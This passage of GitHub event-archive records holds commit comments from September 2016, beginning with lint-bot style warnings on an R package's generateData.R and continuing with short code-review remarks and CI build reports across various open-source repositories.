^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n[R/generateData.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                                ~^~\n```\n[R/generateData.R:72:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:76:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​localComm <- function(alpha_x, alpha_y, Jx, Jy, px) {\n^~~~~~~~~\n```\n[R/generateData.R:82:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:83:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:85:4:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L85) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(is.infinite(I_X) && is.infinite(I_Y)) {\n   ^\n```\n[R/generateData.R:86:29:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​     output <- exp( lgamma(J+1) - \n                           ~^~\n```\n[R/generateData.R:86:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​     output <- exp( lgamma(J+1) - \n                                 ^\n```\n[R/generateData.R:87:36:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(Jx + 1) + \n                                   ^\n```\n[R/generateData.R:89:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    Jx * log(nx) + \n                                  ^\n```\n[R/generateData.R:90:23:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L90) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-Jx) * log(ny))\n                     ~^~\n```\n[R/generateData.R:92:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/generateData.R#L92) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  output <- polyaeggenberger(I_X, I_Y, J, Jx)\n            ^~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2016-09-22T22:53:27Z"}
{"id":"4605595199","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":19138217,"position":null,"line":null,"path":null,"commit_id":"5a9389f8c51d3f60364b9833c9b97a65f52b29ba","created_at":"2016-09-22T22:54:31Z","updated_at":"2016-09-22T22:54:31Z","body":"++"}},"created_at":"2016-09-22T22:54:31Z"}
{"id":"4605595915","type":"CommitCommentEvent","actor":{"login":"clivem"},"repo":{"name":"raspberrypi/firmware"},"payload":{"comment":{"id":19138219,"position":null,"line":null,"path":null,"commit_id":"29d87e7ca06b8a389a89d15ef8a7f56f30a4b92d","created_at":"2016-09-22T22:54:41Z","updated_at":"2016-09-22T22:54:41Z","body":"@popcornmix Where is the source code for this libelftoolchain library? Cant find it in userland repo....."}},"created_at":"2016-09-22T22:54:41Z"}
{"id":"4605598616","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19138225,"position":null,"line":null,"path":null,"commit_id":"2003064414ecd8cb538e7714ba63b367b8320923","created_at":"2016-09-22T22:55:25Z","updated_at":"2016-09-22T22:55:25Z","body":"Nice work"}},"created_at":"2016-09-22T22:55:25Z"}
{"id":"4605601687","type":"CommitCommentEvent","actor":{"login":"dilema1211"},"repo":{"name":"VampiricDirewolf/activism-framework"},"payload":{"comment":{"id":19138231,"position":27,"line":27,"path":"SOCIALMEDIAPLATFORMS.MD","commit_id":"51828ede7d97455e390c42cc726b265b3dbb8b16","created_at":"2016-09-22T22:56:13Z","updated_at":"2016-09-22T22:56:13Z","body":"1,2,3"}},"created_at":"2016-09-22T22:56:13Z"}
{"id":"4605607827","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19138249,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-22T22:57:50Z","updated_at":"2016-09-22T22:57:50Z","body":"This change seems rather serious, so before I get too much further on it I'd like to get some input from @FND and @sashahart (if they are still around).\r\n\r\nAt the moment the import of six is now breaking setup.py so some moving around of modules is likely going to be needed."}},"created_at":"2016-09-22T22:57:50Z"}
{"id":"4605608302","type":"CommitCommentEvent","actor":{"login":"slaporte"},"repo":{"name":"hatnote/montage"},"payload":{"comment":{"id":19138252,"position":66,"line":66,"path":"_run_server_test.py","commit_id":"69cb1899b3bd42470a07f801f83b78b9aaf971b1","created_at":"2016-09-22T22:57:57Z","updated_at":"2016-09-22T22:57:57Z","body":"Fixed!"}},"created_at":"2016-09-22T22:57:57Z"}
{"id":"4605609375","type":"CommitCommentEvent","actor":{"login":"JerryZZW"},"repo":{"name":"yordina/class-coding-2-pointers-template"},"payload":{"comment":{"id":19138255,"position":null,"line":null,"path":null,"commit_id":"3af688d54524aa01f262431924062a556a1c1ea3","created_at":"2016-09-22T22:58:14Z","updated_at":"2016-09-22T22:58:14Z","body":"The team can test the program on travis CI"}},"created_at":"2016-09-22T22:58:14Z"}
{"id":"4605615006","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":19138270,"position":13,"line":57,"path":"examples/simple_client.cpp","commit_id":"70199041f75fd3987889b7b8706ba670f05cf643","created_at":"2016-09-22T22:59:52Z","updated_at":"2016-09-22T22:59:52Z","body":"this need to be above"}},"created_at":"2016-09-22T22:59:52Z"}
{"id":"4605633253","type":"CommitCommentEvent","actor":{"login":"kaspermarstal"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19138317,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T23:04:37Z","updated_at":"2016-09-22T23:04:37Z","body":"I think the beauty of the library-first principle is that the command line program is just an application of the library. And here we show how to use the library. An example 😁 \r\n\r\nIn any case, this is up for discussion. I did not name the executable \"superelastix\" because the is already the name of the superelastix library target, and cmake will then complain. We can think about renaming the library then?"}},"created_at":"2016-09-22T23:04:37Z"}
{"id":"4605634434","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138322,"position":4,"line":359,"path":"app/sessionStore.js","commit_id":"61209bca8a4fd6192beb2e5590cab1f473db249a","created_at":"2016-09-22T23:04:58Z","updated_at":"2016-09-22T23:04:58Z","body":"cc @mrose17 \r\nforgot to mark you as an auditor. The `firstRunTimestamp` was actually being set on the second run. Not sure what impact that has on the ledger"}},"created_at":"2016-09-22T23:04:58Z"}
{"id":"4605636740","type":"CommitCommentEvent","actor":{"login":"ayumi"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138331,"position":null,"line":null,"path":null,"commit_id":"61209bca8a4fd6192beb2e5590cab1f473db249a","created_at":"2016-09-22T23:05:37Z","updated_at":"2016-09-22T23:05:37Z","body":":rice_scene: "}},"created_at":"2016-09-22T23:05:37Z"}
{"id":"4605640334","type":"CommitCommentEvent","actor":{"login":"ayumi"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138349,"position":4,"line":359,"path":"app/sessionStore.js","commit_id":"61209bca8a4fd6192beb2e5590cab1f473db249a","created_at":"2016-09-22T23:06:40Z","updated_at":"2016-09-22T23:06:40Z","body":"i added `firstRunTimestamp` recently, currently it only controls the \"Try Brave Payments!\" notification which happens 10 days after first run."}},"created_at":"2016-09-22T23:06:40Z"}
{"id":"4605645285","type":"CommitCommentEvent","actor":{"login":"reboot"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":19138359,"position":null,"line":null,"path":null,"commit_id":"b9b6f70cd50714f5f6a495ae296a0669eafff08e","created_at":"2016-09-22T23:08:07Z","updated_at":"2016-09-22T23:08:07Z","body":"The source properties window never destroys a properties view itself. The crash does not apply there."}},"created_at":"2016-09-22T23:08:07Z"}
{"id":"4605648035","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138368,"position":4,"line":359,"path":"app/sessionStore.js","commit_id":"61209bca8a4fd6192beb2e5590cab1f473db249a","created_at":"2016-09-22T23:08:54Z","updated_at":"2016-09-22T23:08:54Z","body":"good, so nothing critical. I saw some time calculations but didn't look closely to see what they controlled"}},"created_at":"2016-09-22T23:08:54Z"}
{"id":"4605649002","type":"CommitCommentEvent","actor":{"login":"traveling-desi"},"repo":{"name":"traveling-desi/Web-Technology"},"payload":{"comment":{"id":19138372,"position":null,"line":null,"path":null,"commit_id":"f98afaafe56bffe879c120ef253bd29721adb22b","created_at":"2016-09-22T23:09:12Z","updated_at":"2016-09-22T23:09:12Z","body":"DOC: Updated README.md"}},"created_at":"2016-09-22T23:09:12Z"}
{"id":"4605651816","type":"CommitCommentEvent","actor":{"login":"burmjeff"},"repo":{"name":"burmjeff/packages_apps_bonovoapps"},"payload":{"comment":{"id":19138384,"position":null,"line":null,"path":null,"commit_id":"3e5b20e7ef8035509fb89412704978707c2b01eb","created_at":"2016-09-22T23:10:03Z","updated_at":"2016-09-22T23:10:03Z","body":"Its already in a pull request. Someone just needs to approve it."}},"created_at":"2016-09-22T23:10:03Z"}
{"id":"4605655713","type":"CommitCommentEvent","actor":{"login":"kshvmdn"},"repo":{"name":"thuvejan/ImageHash"},"payload":{"comment":{"id":19138392,"position":67,"line":0,"path":"app.js","commit_id":"070514bc67da2b5ba1708af3a2115d81f056e313","created_at":"2016-09-22T23:11:13Z","updated_at":"2016-09-22T23:11:13Z","body":"Too good for a one-liner??"}},"created_at":"2016-09-22T23:11:13Z"}
{"id":"4605658889","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19138402,"position":47,"line":1031,"path":"background.js","commit_id":"400c9c7521979dfa19a3438ec505fd290c2a44dd","created_at":"2016-09-22T23:12:07Z","updated_at":"2016-09-22T23:12:07Z","body":"а когда текущий контекст может быть не `this` ?"}},"created_at":"2016-09-22T23:12:07Z"}
{"id":"4605659178","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19138403,"position":null,"line":null,"path":null,"commit_id":"5fc285462c5eb8c2c1a65a1f503b857116928af6","created_at":"2016-09-22T23:12:11Z","updated_at":"2016-09-22T23:12:11Z","body":"Hmm, we really ought to remove 81, XBL auth doesn't work prior to 82..."}},"created_at":"2016-09-22T23:12:11Z"}
{"id":"4605659314","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"bmatcuk/doublestar"},"payload":{"comment":{"id":19138404,"position":null,"line":null,"path":null,"commit_id":"915f3ccc3f08f02a828ab8b01b10702d7b49fa30","created_at":"2016-09-22T23:12:14Z","updated_at":"2016-09-22T23:12:14Z","body":"Ah, this helps clarify and makes sense. Thanks!"}},"created_at":"2016-09-22T23:12:14Z"}
{"id":"4605663914","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19138414,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-22T23:13:36Z","updated_at":"2016-09-22T23:13:36Z","body":"I think a separate arg is better and makes the resulting secret more predictable"}},"created_at":"2016-09-22T23:13:36Z"}
{"id":"4605665653","type":"CommitCommentEvent","actor":{"login":"terminatorbot"},"repo":{"name":"terminatorbot/terminator"},"payload":{"comment":{"id":19138416,"position":230,"line":236,"path":"README.md","commit_id":"f6080458c94e66811bac85fd5f4c321c32eb20e3","created_at":"2016-09-22T23:14:06Z","updated_at":"2016-09-22T23:14:06Z","body":"sudo_users = {94413864,0,tonumber(our_id)},--Sudo users"}},"created_at":"2016-09-22T23:14:06Z"}
{"id":"4605671605","type":"CommitCommentEvent","actor":{"login":"alee"},"repo":{"name":"comses/miracle"},"payload":{"comment":{"id":19138428,"position":null,"line":null,"path":null,"commit_id":"00b18217779636548bd2641b57c28269ef5c1de4","created_at":"2016-09-22T23:15:45Z","updated_at":"2016-09-22T23:15:45Z","body":"Cool, this fixed it. I'm experiencing errors with django-revproxy and websockets, where radiant complains about an Upgrade header missing. I'm testing it now with the production nginx reverse proxy set up to see if that works."}},"created_at":"2016-09-22T23:15:45Z"}
{"id":"4605672333","type":"CommitCommentEvent","actor":{"login":"arecarn"},"repo":{"name":"important-business/engine"},"payload":{"comment":{"id":19138431,"position":null,"line":null,"path":null,"commit_id":"868ae912b05c48fd31129f8aa9bf9c810478a0a5","created_at":"2016-09-22T23:15:58Z","updated_at":"2016-09-22T23:15:58Z","body":"Thanks for the catch :)"}},"created_at":"2016-09-22T23:15:58Z"}
{"id":"4605681330","type":"CommitCommentEvent","actor":{"login":"Pub4Game"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19138449,"position":null,"line":null,"path":null,"commit_id":"da8678bf4ffec1d67e929098a43622a8dafda7ac","created_at":"2016-09-22T23:18:34Z","updated_at":"2016-09-22T23:18:34Z","body":"I'm just amazed at the stupidity. I did exactly the same change many more hours ago."}},"created_at":"2016-09-22T23:18:34Z"}
{"id":"4605682139","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138450,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-22T23:18:48Z","updated_at":"2016-09-22T23:18:48Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T23:18:48Z"}
{"id":"4605684009","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138459,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-22T23:19:18Z","updated_at":"2016-09-22T23:19:18Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T23:19:18Z"}
{"id":"4605686021","type":"CommitCommentEvent","actor":{"login":"drcz"},"repo":{"name":"drcz/CONSpiracy-language"},"payload":{"comment":{"id":19138465,"position":null,"line":null,"path":null,"commit_id":"abf404b03bad9c518be203895507650c011716f2","created_at":"2016-09-22T23:19:56Z","updated_at":"2016-09-22T23:19:56Z","body":"Szacowny Panie,\r\nPański ojciec wyglądał jak Shen gdy Pana robił.\r\nUkłony,\r\nd."}},"created_at":"2016-09-22T23:19:56Z"}
{"id":"4605686774","type":"CommitCommentEvent","actor":{"login":"rduvalwa5"},"repo":{"name":"rduvalwa5/Examples"},"payload":{"comment":{"id":19138468,"position":null,"line":null,"path":null,"commit_id":"ad378afb2c31b73133227d750ecd32a6d8f97c73","created_at":"2016-09-22T23:20:10Z","updated_at":"2016-09-22T23:20:10Z","body":"add date time to examples"}},"created_at":"2016-09-22T23:20:10Z"}
{"id":"4605691321","type":"CommitCommentEvent","actor":{"login":"panicz"},"repo":{"name":"drcz/CONSpiracy-language"},"payload":{"comment":{"id":19138479,"position":null,"line":null,"path":null,"commit_id":"abf404b03bad9c518be203895507650c011716f2","created_at":"2016-09-22T23:21:26Z","updated_at":"2016-09-22T23:21:26Z","body":"Oklaski!"}},"created_at":"2016-09-22T23:21:26Z"}
{"id":"4605692777","type":"CommitCommentEvent","actor":{"login":"drcz"},"repo":{"name":"drcz/CONSpiracy-language"},"payload":{"comment":{"id":19138481,"position":null,"line":null,"path":null,"commit_id":"abf404b03bad9c518be203895507650c011716f2","created_at":"2016-09-22T23:21:53Z","updated_at":"2016-09-22T23:21:53Z","body":"Pozdro997 V"}},"created_at":"2016-09-22T23:21:53Z"}
{"id":"4605694188","type":"CommitCommentEvent","actor":{"login":"zingale"},"repo":{"name":"BoxLib-Codes/Castro"},"payload":{"comment":{"id":19138482,"position":29,"line":293,"path":"Source/Src_1d/RadHydro_1d.f90","commit_id":"96130793ec4a909bbc57201e3988b0b164cd18a2","created_at":"2016-09-22T23:22:18Z","updated_at":"2016-09-22T23:22:18Z","body":"this line doesn't look right -- should be # of components"}},"created_at":"2016-09-22T23:22:18Z"}
{"id":"4605697324","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19138491,"position":null,"line":null,"path":null,"commit_id":"da8678bf4ffec1d67e929098a43622a8dafda7ac","created_at":"2016-09-22T23:23:12Z","updated_at":"2016-09-22T23:23:12Z","body":"@Pub4Game without proper testing."}},"created_at":"2016-09-22T23:23:12Z"}
{"id":"4605697698","type":"CommitCommentEvent","actor":{"login":"paragraph82"},"repo":{"name":"paragraph82/itube"},"payload":{"comment":{"id":19138497,"position":null,"line":null,"path":null,"commit_id":"5f0383a8879b76603aa423baf1d073d5cc4de064","created_at":"2016-09-22T23:23:18Z","updated_at":"2016-09-22T23:23:18Z","body":"5f0383a8879b76603aa423baf1d073d5cc4de064"}},"created_at":"2016-09-22T23:23:18Z"}
{"id":"4605699837","type":"CommitCommentEvent","actor":{"login":"zingale"},"repo":{"name":"BoxLib-Codes/Castro"},"payload":{"comment":{"id":19138505,"position":101,"line":488,"path":"Source/Src_1d/RadHydro_1d.f90","commit_id":"96130793ec4a909bbc57201e3988b0b164cd18a2","created_at":"2016-09-22T23:23:59Z","updated_at":"2016-09-22T23:23:59Z","body":"this isn't right -- U, not p"}},"created_at":"2016-09-22T23:23:59Z"}
{"id":"4605701294","type":"CommitCommentEvent","actor":{"login":"zingale"},"repo":{"name":"BoxLib-Codes/Castro"},"payload":{"comment":{"id":19138509,"position":105,"line":490,"path":"Source/Src_1d/RadHydro_1d.f90","commit_id":"96130793ec4a909bbc57201e3988b0b164cd18a2","created_at":"2016-09-22T23:24:25Z","updated_at":"2016-09-22T23:24:25Z","body":"this isn't right -- div, not p!"}},"created_at":"2016-09-22T23:24:25Z"}
{"id":"4605702503","type":"CommitCommentEvent","actor":{"login":"janetkuo"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19138510,"position":30,"line":2010,"path":"test/e2e/framework/util.go","commit_id":"e792d4117d8735784f4d830ad1c9d4f68cfee145","created_at":"2016-09-22T23:24:46Z","updated_at":"2016-09-22T23:24:46Z","body":"@sttts what does 127 mean?"}},"created_at":"2016-09-22T23:24:46Z"}
{"id":"4605703554","type":"CommitCommentEvent","actor":{"login":"zingale"},"repo":{"name":"BoxLib-Codes/Castro"},"payload":{"comment":{"id":19138512,"position":106,"line":491,"path":"Source/Src_1d/RadHydro_1d.f90","commit_id":"96130793ec4a909bbc57201e3988b0b164cd18a2","created_at":"2016-09-22T23:25:05Z","updated_at":"2016-09-22T23:25:05Z","body":"umm... ya know\r\n"}},"created_at":"2016-09-22T23:25:05Z"}
